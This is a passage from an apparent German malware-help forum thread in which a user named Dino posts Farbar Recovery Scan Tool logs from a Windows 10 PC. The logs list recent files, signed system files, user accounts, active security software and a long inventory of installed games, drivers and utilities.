2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\lt-LT
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\et-EE
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\en-GB
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\spool
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\oobe
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\lv-LV
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\lt-LT
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\InputMethod
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\et-EE
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\en-GB
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\InputMethod
2017-05-07 17:14 - 2017-01-29 17:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavalys
2017-05-07 17:14 - 2017-01-22 15:26 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Hammer & Chisel, Inc
2017-05-07 17:14 - 2016-11-30 18:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDF24
2017-05-07 17:14 - 2016-11-30 18:10 - 00000000 ____D C:\WINDOWS\system32\ÿÿÿÿÿÿÿÿ8
2017-05-07 17:14 - 2016-05-01 13:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vulkan 1.0.3.1
2017-05-07 17:14 - 2015-08-31 18:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung
2017-05-07 17:14 - 2015-04-26 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon Utilities
2017-05-07 17:14 - 2015-04-26 14:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Paradox Interactive
2017-05-07 17:14 - 2015-04-25 17:37 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2017-05-07 17:14 - 2015-04-25 07:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Realtek
2017-05-07 17:14 - 2015-04-25 07:16 - 00000000 ____D C:\Program Files\Intel
2017-05-07 17:14 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Shared
2017-05-07 17:14 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Media.Shared
2017-05-07 17:13 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2017-05-01 12:45 - 2015-04-25 07:04 - 00000000 ____D C:\ProgramData\AMD
2017-05-01 12:44 - 2016-05-01 13:18 - 00000000 ____D C:\Program Files (x86)\VulkanRT
2017-05-01 12:17 - 2016-09-30 17:45 - 00000000 ____D C:\ProgramData\Package Cache
2017-05-01 10:53 - 2015-04-25 17:43 - 00000000 ____D C:\Users\Dino\AppData\Local\Steam
2017-04-29 03:05 - 2017-03-18 23:06 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-04-29 03:05 - 2017-03-18 23:06 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-04-25 01:06 - 2017-04-14 01:44 - 00795616 _____ C:\WINDOWS\SysWOW64\atiapfxx.blb
2017-04-25 01:06 - 2017-04-14 01:44 - 00795616 _____ C:\WINDOWS\system32\atiapfxx.blb
2017-04-25 00:56 - 2017-04-14 01:44 - 03437632 _____ C:\WINDOWS\system32\atiumd6a.cap
2017-04-25 00:51 - 2017-04-14 01:44 - 03471376 _____ C:\WINDOWS\SysWOW64\atiumdva.cap
2017-04-22 19:40 - 2015-04-26 13:54 - 00000000 ____D C:\Users\Dino\AppData\Local\JDownloader v2.0
==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======
2015-04-25 17:18 - 2017-01-27 23:52 - 0007601 _____ () C:\Users\Dino\AppData\Local\Resmon.ResmonCfg
2017-02-05 19:40 - 2017-02-05 19:40 - 0046145 _____ () C:\ProgramData\agent.1486316443.bdinstall.bin
2017-02-05 20:08 - 2017-02-05 20:08 - 0026583 _____ () C:\ProgramData\agent.1486318128.bdinstall.bin
2017-02-05 20:09 - 2017-02-05 20:09 - 0026510 _____ () C:\ProgramData\agent.1486318150.bdinstall.bin
2017-02-05 20:52 - 2017-02-05 20:52 - 0046366 _____ () C:\ProgramData\agent.1486320772.bdinstall.bin
2017-02-05 20:55 - 2017-02-05 20:55 - 0028837 _____ () C:\ProgramData\agent.1486320909.bdinstall.bin
2017-02-05 20:57 - 2017-02-05 20:57 - 0046212 _____ () C:\ProgramData\agent.1486321078.bdinstall.bin
2017-02-05 21:01 - 2017-02-05 21:01 - 0026790 _____ () C:\ProgramData\agent.1486321314.bdinstall.bin
2017-02-05 21:02 - 2017-02-05 21:02 - 0028833 _____ () C:\ProgramData\agent.1486321377.bdinstall.bin
2017-02-05 21:11 - 2017-02-05 21:11 - 0046370 _____ () C:\ProgramData\agent.1486321901.bdinstall.bin
2017-02-09 19:09 - 2017-02-09 19:09 - 0028754 _____ () C:\ProgramData\agent.1486660167.bdinstall.bin
2017-03-08 21:56 - 2017-03-08 21:56 - 0029970 _____ () C:\ProgramData\agent.update.1489002971.bdinstall.bin
2017-02-05 21:15 - 2017-02-05 21:15 - 0381546 _____ () C:\ProgramData\cl.1486322005.bdinstall.bin
2017-02-05 21:17 - 2017-02-05 21:17 - 0055877 _____ () C:\ProgramData\dm.1486322271.bdinstall.bin
2017-02-07 23:33 - 2017-02-07 23:33 - 0035238 _____ () C:\ProgramData\dm.1486503192.bdinstall.bin
2017-05-07 17:13 - 2017-05-07 17:13 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
Einige Dateien in TEMP:
====================
2017-05-19 14:16 - 2017-05-19 14:16 - 7178424 _____ (VS Revo Group ) C:\Users\Dino\AppData\Local\Temp\VSUSetup.exe
==================== Bamital & volsnap ======================
(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert
LastRegBack: 2017-05-19 15:19
==================== Ende von FRST.txt ============================
|
|
21.05.2017, 20:26
| #8 |
| | Trojaner, Adware oder sonstiges ?Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 20-05-2017
durchgeführt von Dino (21-05-2017 21:24:27)
Gestartet von C:\Users\Dino\Desktop
Windows 10 Pro Version 1703 (X64) (2017-05-07 15:20:06)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
Administrator (S-1-5-21-3554052566-3312977812-1675691648-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3554052566-3312977812-1675691648-503 - Limited - Disabled)
Dino (S-1-5-21-3554052566-3312977812-1675691648-1001 - Administrator - Enabled) => C:\Users\Dino
Gast (S-1-5-21-3554052566-3312977812-1675691648-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3554052566-3312977812-1675691648-1003 - Limited - Enabled)
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Bitdefender Virenschutz (Enabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371}
AS: Bitdefender Spyware-Schutz (Enabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Bitdefender Firewall (Enabled) {078AF241-05A3-0EFF-40E0-3E0D69EA140A}
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
ACP Application (Version: 2016.0321.0955.20 - Advanced Micro Devices, Inc.) Hidden
Adblock Plus für IE (32-Bit- und 64-Bit) (HKLM\...\{C27EF409-FB69-451F-B996-DC853C25FCA2}) (Version: 1.4 - Eyeo GmbH)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated)
AI Suite 3 (HKLM-x32\...\{CD36E28B-6023-469A-91E7-049A2874EC13}) (Version: 1.00.92 - ASUSTeK Computer Inc.)
AMD Settings (HKLM\...\WUCCCApp) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.8 - Advanced Micro Devices, Inc.)
ANNO 1404 - Königsedition (HKLM-x32\...\{3D9CF3CA-3AB0-4A82-9853-D7C43FD1D775}) (Version: 3.10.0000 - Ubisoft)
ANNO 2070 (HKLM-x32\...\{B48E264C-C8CD-4617-B0BE-46E977BAD694}) (Version: 1.0.0.0 - Ubisoft)
Anno 2205 (HKLM-x32\...\Uplay Install 1253) (Version: - Ubisoft)
ASUS GPU Tweak (HKLM-x32\...\InstallShield_{532F6E8A-AF97-41C3-915F-39F718EC07D1}) (Version: 2.8.2.0 - ASUSTek COMPUTER INC.)
ASUS GPU Tweak (x32 Version: 2.8.2.0 - ASUSTek COMPUTER INC.) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Besiege (HKLM-x32\...\Steam App 346010) (Version: - Spiderling Studios)
Bitdefender Agent (HKLM\...\Bitdefender Agent) (Version: 21.0.18.898 - Bitdefender)
Bitdefender Internet Security 2017 (HKLM\...\Bitdefender) (Version: 21.0.23.1101 - Bitdefender)
Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.5.0.0 - Canon Inc.)
Canon IJ Network Scanner Selector EX (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX) (Version: 1.5.2.3 - Canon Inc.)
Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: 3.5.0 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: 1.1.10.15 - Canon Inc.)
Canon MG5600 series Benutzerregistrierung (HKLM-x32\...\Canon MG5600 series Benutzerregistrierung) (Version: - *Canon Inc.)
Canon MG5600 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG5600_series) (Version: 1.00 - Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.2.1 - Canon Inc.)
Catalyst Control Center Next Localization BR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Cities Skyline (HKLM-x32\...\Cities Skyline_is1) (Version: 1.0.5.0 - Paradox Interactive)
CrystalDiskInfo 6.3.2 (HKLM-x32\...\CrystalDiskInfo_is1) (Version: 6.3.2 - Crystal Dew World)
Discord (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.)
Drakonia Configurator (HKLM-x32\...\{2EAD3327-2F92-455F-A675-E5CC4980B67A}}_is1) (Version: - )
ElsterFormular (HKLM-x32\...\ElsterFormular) (Version: 18.2.22525 - Landesfinanzdirektion Thüringen)
EVEREST Home Edition v2.20 (HKLM-x32\...\EVEREST Home Edition_is1) (Version: 2.20 - Lavalys Inc)
Ghost Recon Wildlands Beta (HKLM-x32\...\Uplay Install 2970) (Version: - Ubisoft)
Ghostery (HKLM-x32\...\Ghostery) (Version: - Ghostery Inc)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 58.0.3029.110 - Google Inc.)
Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Microsoft OneDrive (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio 2010-Tools für Office-Laufzeit (x64) Language Pack - DEU (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - DEU) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{B3B750C0-8C22-439D-B7CE-67F3ED99CC2B}) (Version: 1.20.146.0 - Microsoft)
Mozilla Firefox 53.0.2 (x86 de) (HKLM-x32\...\Mozilla Firefox 53.0.2 (x86 de)) (Version: 53.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 53.0.2.6333 - Mozilla)
Origin (HKLM-x32\...\Origin) (Version: 9.7.2.53208 - Electronic Arts, Inc.)
Panda Devices Agent (x32 Version: 1.03.07 - Panda Security) Hidden
Panda Devices Agent (x32 Version: 1.06.00 - Panda Security) Hidden
Panda Free Antivirus (Version: 8.04.00.0000 - Panda Security) Hidden
PDF24 Creator 7.9.0 (HKLM-x32\...\{81A6F461-0DBA-4F12-B56F-0E977EC10576}_is1) (Version: - PDF24.org)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.31.423.2014 - Realtek)
Realtek Ethernet Diagnostic Utility (HKLM-x32\...\{DADC7AB0-E554-4705-9F6A-83EA82ED708E}) (Version: 2.0.2.7 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7503 - Realtek Semiconductor Corp.)
Revo Uninstaller 2.0.3 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.3 - VS Revo Group, Ltd.)
Sacred 3 (HKLM-x32\...\Steam App 247950) (Version: - Keen Games)
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (x32 Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.) Hidden
Samsung Magician (HKLM-x32\...\{29AE3F9F-7158-4ca7-B1ED-28A73ECDB215}_is1) (Version: 4.5.1 - Samsung Electronics)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.)
Samsung_MonSetup (HKLM-x32\...\{8EA79DBF-D637-448A-89D6-410A087A4493}) (Version: 1.00.0000 - Samsung)
SimCity™ (HKLM-x32\...\{F70FDE4B-8F86-4eb6-8C8E-636EC89F6419}) (Version: 4.0.86.0859 - Electronic Arts)
Skype™ 7.4 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.4.102 - Skype Technologies S.A.)
Smart Switch (HKLM-x32\...\InstallShield_{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17022.20 - Samsung Electronics Co., Ltd.)
Smart Switch (x32 Version: 4.1.17022.20 - Samsung Electronics Co., Ltd.) Hidden
Spotify (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Spotify) (Version: 1.0.48.103.g15edf1ec - Spotify AB)
StarCraft II (HKLM-x32\...\StarCraft II) (Version: - Blizzard Entertainment)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
Tom Clancy's The Division (HKLM-x32\...\Uplay Install 568) (Version: - Ubisoft)
Unlocker 1.9.2 (HKLM\...\Unlocker) (Version: 1.9.2 - Cedrick Collomb)
Uplay (HKLM-x32\...\Uplay) (Version: 6.0 - Ubisoft)
Vulkan Run Time Libraries 1.0.3.1 (HKLM\...\VulkanRT1.0.3.1) (Version: 1.0.3.1 - LunarG, Inc.)
